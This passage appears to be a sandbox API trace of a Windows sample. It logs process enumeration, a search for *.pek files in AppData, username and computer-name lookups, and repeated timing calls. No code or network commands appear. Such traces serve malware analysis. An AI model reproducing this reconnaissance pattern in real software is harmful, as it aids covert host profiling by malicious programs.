th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.759] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.760] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.784] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.785] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.785] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.786] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.787] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.787] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.788] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.789] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.789] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.790] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.791] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.791] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.792] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.793] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.793] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.794] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.795] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.800] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.801] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.802] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.803] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.805] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.810] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.812] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0096.813] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0096.814] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0096.816] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0096.817] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0096.820] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0096.821] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0096.822] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0096.823] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0096.825] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0096.826] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0096.829] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0096.831] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0096.832] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0096.833] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0096.834] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0096.836] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0096.961] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0096.962] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0096.964] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.965] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.967] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.968] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.970] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.971] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.972] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0096.973] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0096.975] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.976] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.977] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.979] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.980] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.981] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0096.982] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.984] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xad4, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.985] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 1 [0096.986] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.987] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.988] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.990] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.991] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0096.992] CloseHandle (hObject=0xc8) returned 1 [0096.992] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\*.pek", lpFindFileData=0x12f9e8 | out: lpFindFileData=0x12f9e8) returned 0xffffffff [0096.992] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0096.992] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15378120457) returned 1 [0096.992] GetTickCount () returned 0x233bc [0096.992] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2ff)) [0096.992] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2ff)) [0096.992] GetCurrentThreadId () returned 0xaf0 [0096.992] GetCurrentThread () returned 0xfffffffe [0096.992] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0096.992] GetCurrentProcessId () returned 0xaec [0096.992] GetCurrentProcess () returned 0xffffffff [0096.992] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0096.992] GetSystemTimes (in: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4 | out: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4) returned 1 [0096.993] QueryPerformanceFrequency (in: lpFrequency=0x12fad8 | out: lpFrequency=0x12fad8) returned 1 [0096.993] GetUserNameA (in: lpBuffer=0x12f9d8, pcbBuffer=0x12f9d4 | out: lpBuffer="EEBsYm5", pcbBuffer=0x12f9d4) returned 1 [0097.373] GetComputerNameA (in: lpBuffer=0x12f9d8, nSize=0x12f9d4 | out: lpBuffer="CRH2YWU7", nSize=0x12f9d4) returned 1 [0097.373] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15416205115) returned 1 [0097.373] GetTickCount () returned 0x233fa [0097.373] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x33d)) [0097.373] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x33d)) [0097.373] Sleep (dwMilliseconds=0x0) [0097.395] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15418386238) returned 1 [0097.395] GetTickCount () returned 0x2340a [0097.395] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x34d)) [0097.395] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x34d)) [0097.395] Sleep (dwMilliseconds=0x1) [0097.411] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15420053809) returned 1 [0097.411] GetTickCount () returned 0x2341a [0097.411] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x35c)) [0097.411] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x35c)) [0097.411] GetCurrentThreadId () returned 0xaf0 [0097.412] GetCurrentThread () returned 0xfffffffe [0097.412] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0097.412] GetCurrentProcessId () returned 0xaec [0097.412] GetCurrentProcess () returned 0xffffffff [0097.412] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc | out: lpCreationTime=0x12fab4, lpExitTime=0x12fabc, lpKernelTime=0x12fac4, lpUserTime=0x12facc) returned 1 [0097.412] GetSystemTimes (in: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4 | out: lpIdleTime=0x12fab4, lpKernelTime=0x12fabc, lpUserTime=0x12fac4) returned 1 [0097.412] Sleep (dwMilliseconds=0x0) [0097.451] QueryPerformanceCounter (in: lpPerformanceCount=0x12fabc | out: lpPerformanceCount=0x12fabc*=15424067787) returned 1 [0097.451] GetTickCount () returned 0x23448 [0097.452] GetLocalTime (in: lpSystemTime=0x12fab4 | out: lpSystemTime=0x12fab4*(wYear=0x7e2, 